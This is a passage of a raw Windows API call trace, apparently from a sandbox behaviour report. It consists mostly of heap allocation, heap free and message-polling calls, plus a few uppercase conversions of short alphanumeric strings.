Size=0x20) returned 0x2a78458 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0138.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0138.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0138.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0138.532] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0138.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0138.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0138.533] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.533] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0138.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.534] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0138.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0138.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.535] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0138.535] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fa0 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0138.535] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0138.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0138.535] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0138.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0138.536] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0138.536] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0138.536] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ed8 [0138.536] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0138.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0138.536] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0138.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0138.537] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0138.537] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ed8 | out: hHeap=0x2af0000) returned 1 [0138.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0138.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0138.538] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0138.538] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0138.538] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0138.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0c0 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0138.538] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0138.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0138.539] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0138.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0138.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0138.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0138.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0138.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0138.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0138.540] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0138.540] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0138.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0138.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0138.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0138.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 